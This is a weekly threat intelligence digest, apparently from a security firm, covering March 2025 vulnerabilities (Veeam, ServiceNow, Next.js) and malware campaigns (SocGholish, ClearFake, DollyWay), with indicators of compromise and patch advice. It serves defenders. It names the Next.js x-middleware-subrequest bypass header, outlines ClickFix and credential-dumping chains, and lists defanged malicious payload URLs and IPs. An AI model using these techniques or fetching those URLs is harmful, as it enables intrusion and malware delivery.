Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Veeam Patches Critical Remote Code Execution Vulnerability - On March 19, 2025, Veeam patched a critical remote code execution (RCE) vulnerability affecting its Veeam Backup & Replication versions 12.3.0.310 and all earlier version 12 builds, tracked as CVE-2025-23120. Successful exploitation could allow threat actors to conduct RCE and escalate privileges.
At the time of writing, there are no reports of this vulnerability being exploited in the wild.
Threat Actors are Increasingly Exploiting ServiceNow Flaws - On March 18, 2025, GreyNoise identified a resurgence of attackers exploiting critical vulnerabilities in ServiceNow's platform, specifically CVE-2024-4879, CVE-2024-5217, and CVE-2024-5178. These vulnerabilities, disclosed and patched in mid-2024, allow unauthenticated threat actors to execute arbitrary code and access sensitive data within the ServiceNow platform.
We recommend that impacted instances are immediately patched and the malicious IPs detailed within the linked report are blocked.
Vercel Security Team Patches Critical Next.js Authorization Bypass Vulnerability - On March 21, 2025, Vercel Security Team patched CVE-2025-29927, a critical-severity vulnerability affecting Next.js, a React framework for building full-stack web applications. CVE-2025-29927 is an authorization bypass flaw in Next.js that arises from performing authorisation checks only in middleware (a function that inspects requests before they reach a route or API).
Exploitation allows threat actors to send requests with the x-middleware-subrequest header to bypass authorisation checks, potentially leading to unauthorised access to restricted features or data. At the time of writing, there have been no reports of this vulnerability being exploited in the wild.
We recommend that organisations promptly apply the patches for CVE-2025-29927 if Next.js is part of their technology infrastructure.
Potential Threats
GoDaddy Uncovers Eight-Year Malware Campaign Compromising 20,000 WordPress Websites - On March 17, 2025, domain registrar GoDaddy reported a long-running malware campaign known as “DollyWay.” The campaign has been active since 2016 and is likely responsible for compromising more than 20,000 WordPress websites. The campaign has evolved into three major versions, employing techniques such as dynamic multi-stage script injection, persistent reinfection, cryptographic backdoors, and traffic monetization via affiliate scam networks.
The latest version, DollyWay v3, functions primarily as a large-scale redirect operation monetised via affiliate scheme networks such as VexTrio and LosPollos. DollyWay v3 injects a multi-stage JavaScript chain into compromised WordPress sites that redirects site visitors to scam content after user interaction, such as clicking. To evade detection and increase profitability, DollyWay uses a Traffic Direction System (TDS) that filters out bots, administrators, and users without HTTP referrers.
The operation repurposes infected WordPress sites as part of its distributed Command and Control (C2) and TDS infrastructure.
SocGholish Malware Uses Compromised Websites to Deliver RansomHub Ransomware - SocGholish malware is being used to distribute RansomHub ransomware through compromised websites in an ongoing campaign, Trend Micro reported on March 14, 2025. The campaign has been active since the start of 2025.
SocGholish is a Malware-as-a-Service (MaaS) framework that uses obfuscated JavaScript loaders to evade detection and execute malicious payloads. RansomHub ransomware uses encryption algorithms and evasion techniques, such as process hollowing and API unhooking, to bypass security measures and avoid detection.
Once the environment is fully compromised, SocGholish finally deploys RansomHub ransomware, encrypting files across local and network storage and delivering a ransom note demanding payment for file recovery or decryption.
Latest ClearFake Variant Employs Fake reCAPTCHA and Cloudflare Turnstile Verifications to Deliver Lumma Stealer and Vidar Stealer - On March 18, 2025, cybersecurity firm Sekoia published a write-up detailing the latest ClearFake variant. ClearFake is a malicious JavaScript framework that targets victims through compromised WordPress websites, serving fake browser update notifications and security prompts to trick victims into executing PowerShell commands and delivering malware.
Per Sekoia, this new ClearFake version, active since December 2024, enhances social engineering tactics with fake reCAPTCHA and Cloudflare Turnstile verifications, tricking victims into executing PowerShell scripts, leading to the deployment of Lumma Stealer and Vidar Stealer.
General News
New Browser-in-the-Middle (BitM) Attack Bypasses MFA to Hijack User Sessions - A new session hijacking technique, dubbed Browser-in-the-Middle (BitM), bypasses multi-factor authentication (MFA) and exfiltrates user sessions. According to a March 17, 2025, report by Mandiant, BitM targets applications that enable initial access to privileged networks or environments via Virtual Desktop Infrastructure (VDI). This allows threat actors to deploy session-stealing infrastructure against publicly exposed systems with minimal configuration.
According to Mandiant, the BitM attack flow likely begins when threat actors trick victims into visiting and logging into phishing sites. Once victims complete MFA authentication, threat actors gain full control of their authenticated sessions and conduct malicious activities.
23andMe files for bankruptcy, putting customers’ genetic data at risk - The genetic testing company 23andMe has begun Chapter 11 bankruptcy proceedings, alarming regulators and privacy advocates who are warning customers to delete genetic information retained by the company.
The firm has been in financial distress for some time as interest in its at-home, saliva-based DNA tests has ebbed. In October 2023 it suffered a massive data breach causing major reputational damage and exposing the genetic information of more than six million people.
Much of that data ended up on the dark web, 23andMe has said. Last September, the firm agreed to pay $30 million in a class action lawsuit which consolidated dozens of other suits. “After a thorough evaluation of strategic alternatives, we have determined that a court-supervised sale process is the best path forward to maximise the value of the business,” Mark Jensen, chair of the board of directors, said in a statement. “We believe in the value of our people and our assets.”
The firm pledged not to change its policies around customer data management and access, saying buyers will have to agree to “comply with applicable law with respect to the treatment of customer data.”
Major web services go dark in Russia amid reported Cloudflare block - Russian internet users this week faced widespread outages that regulators attributed to issues with “foreign server infrastructure.” However, local experts suggested the disruptions stemmed from Russia’s blocking of Cloudflare, a U.S.-based service that helps websites stay secure, load faster, and remain accessible during cyberattacks.
According to data from several internet monitoring websites, the outages were observed Thursday across multiple Russian regions, particularly in the Urals and Siberia, affecting platforms such as TikTok, Steam, Twitch, Epic Games, Duolingo and major Russian mobile operators.
The disruption also impacted banking and government services, with users reporting difficulties accessing apps for Sberbank, Gazprombank and Alfa-Bank, as well as the Russian government’s portal. Messaging apps, including Telegram and WhatsApp, also faced interruptions.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group’s severity. These updates can be seen below.
| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Increase | Opportunity | Intent | ||||||
|---|---|---|---|---|---|---|---|---|---|
| UAC-0056 | ● High | → | ● High | ● 78 | → | ● 84 | ● 25 | → | ● 25 |
| Kimsuky | ● High | → | ● High | ● 92 | → | ● 95 | ● 30 | → | ● 30 |
| APT10 | ● Moderate | → | ● Moderate | ● 54 | → | ● 60 | ● 25 | → | ● 25 |
| MuddyWater | ● Moderate | → | ● Moderate | ● 56 | → | ● 61 | ● 25 | → | ● 25 |
| j0k3r369 | ● NEW | → | ● Basic | ● NEW | → | ● 30 | ● NEW | → | ● 25 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren’t disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions,
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | ||||
|---|---|---|---|---|---|---|---|
| Cloak Ransomware Group | ▲ | VanHelsing Ransomware | ▲ | CVE-2025-26633 | ▲ | Transportation | ▲ |
|
DieNet |
▲ | ATM Jackpotting | ▲ | CVE-2025-29927 | ▲ | Cloud Service Provider | ▲ |
| Israel | ▲ | StilachiRAT | ▲ | CVE-2024-4577 | ▲ | Human Capital Management | ▲ |
| Dark Storm Team | ▲ | FogDoor | ▲ | CVE-2025-1098 | ▲ | Oracle | ▲ |
| Finn Balor | ▲ | Cloak Ransomware | ▲ |
CVE-2025-1974 |
▲ | Malaysia Airports Holdings Bhd | ▲ |
Prominent Information Security Events
SocGholish Malware Uses Compromised Websites to Deliver RansomHub Ransomware.
Source: Insikt Group, Trend Micro | Validated Intelligence Event
IOC: IP - 194.135.104[.]175
IOC: IP - 162.252.173[.]12
IOC: Domain - academy.entrepreneurwealthhub[.]com
IOC: Domain - estate.envisionfonddulac[.]org
SocGholish malware is being used to distribute RansomHub ransomware through compromised websites in an ongoing campaign, Trend Micro reported on March 14, 2025. The campaign has been active since the start of 2025. SocGholish is a Malware-as-a-Service (MaaS) framework that uses obfuscated JavaScript loaders to evade detection and execute malicious payloads. RansomHub ransomware uses encryption algorithms and evasion techniques, such as process hollowing and API unhooking, to bypass security measures and avoid detection.
The attack chain begins when threat actors inject obfuscated JavaScript into legitimate websites. Once victims access these websites, they are redirected to fake browser update notifications, prompting them to download a malicious ZIP file containing SocGholish. Once executed, SocGholish initiates an environment profiling, collects system information from the infected system, and transmits it to the threat actors’ command-and-control (C2) server. The C2 server responds with commands that allow the SocGholish to install additional payloads, exfiltrate sensitive information, and execute malicious commands on infected systems. The infection progresses as SocGholish deploys backdoor components, providing persistent access for RansomHub ransomware operators.
Threat actors also use SocGholish to initiate credential theft and lateral movement, extracting credentials stored in browsers like Microsoft Edge and Google Chrome, dumping Windows registry hives (SAM, SECURITY, SYSTEM) from a volume shadow copy, and retrieving system information.
Once the environment is fully compromised, it finally deploys RansomHub ransomware, encrypting files across local and network storage and the delivery of a ransom note demanding payment for file recovery or decryption.
Latest ClearFake Variant Employs Fake reCAPTCHA and Cloudflare Turnstile Verifications to Deliver Lumma Stealer and Vidar Stealer.
Source: Insikt Group, Sekoia | TTP Instance
IOC: URL - hxxps://start.cleaning-room-device[.]shop/sha589.m4a
IOC: URL - hxxps://ai.fdswgw[.]shop/one.mp4
IOC: URL - hxxps://nbhg-v.iuksdfb-f[.]shop/ajax.mp3
IOC: URL - hxxps://raw.githubusercontent[.]com/Vincent-48/html/refs/heads/master/TestLAB.exe
On March 18, 2025, cybersecurity firm Sekoia published a write-up detailing the latest ClearFake variant. ClearFake is a malicious JavaScript framework that targets victims through compromised WordPress websites, serving fake browser update notifications and security prompts to trick victims into executing PowerShell commands and delivering malware. Per Sekoia, this new ClearFake version, active since December 2024, enhances social engineering tactics with fake reCAPTCHA and Cloudflare Turnstile verifications, tricking victims into executing PowerShell scripts, leading to the deployment of Lumma Stealer and Vidar Stealer.
Based on Sekoia’s analysis, threat actors inject malicious JavaScript code into compromised WordPress websites. The JavaScript code loads dependencies, such as “pako”, “web3”, and “crypto”, and interacts with the Binance Smart Chain (BSC) using a custom Application Binary Interface (ABI) to fetch additional obfuscated JavaScript code.
Next, the second-stage JavaScript code retrieves an encrypted HTML file that contains the ClickFix lure from malicious URLs. At the time of writing, the URLs return error messages.
The second-stage JavaScript code decrypts the HTML file and embeds it into an iFrame, displaying either a fake Cloudflare Turnstile verification or a fake reCAPTCHA challenge. Once a victim interacts with the fake CAPTCHA, the script copies a ClickFix PowerShell command into their clipboard. The script fetches the PowerShell commands from remote URLs such as those above. At the time of writing, the URLs return error messages.
The fake CAPTCHA page instructs the victim to paste and execute the command in the Windows Run dialog (Win+R).
Once the victim executes the ClickFix PowerShell command, it runs “Mshta.exe” with an obfuscated script that loads a remote MSHTA script from URLs like those above. At the time of writing, the URLs return error messages. Once executed, the MSHTA script executes a heavily obfuscated JavaScript designed to retrieve a second-stage PowerShell script.
The second-stage PowerShell script downloads an encrypted binary payload from remote sources and decrypts it using AES. At the time of writing, the URL returns an error message. The decrypted payload contains the Emmenhtal Loader, which disables security defenses and installs additional malware. The Emmenhtal Loader executes Lumma Stealer, an information stealer, to extract stored browser credentials, cookies, cryptocurrency wallet data, and system information. In some cases, threat actors replace Lumma Stealer with Vidar Stealer, which follows the same data theft process. Finally, Lumma Stealer or Vidar Stealer exfiltrates stolen data to threat actor-controlled command-and-control (C2) servers.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2025-23120 - Veeam Backup & Replication to version 12.3.1 (build 12.3.1.1139) to reduce the risk of exploitation.
- CVE-2024-4879, CVE-2024-5217, and CVE-2024-5178 - Apply the latest patches and updates for the Impacted releases of ServiceNow Utah, Washington and Vancouver.
- CVE-2025-29927 - We would recommend updating Next.js to the following versions:
- 15.x → fixed in 15.2.3
- 14.x → fixed in 14.2.25
- 13.x → fixed in 13.5.9
- 12.x → fixed in 12.3.5
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.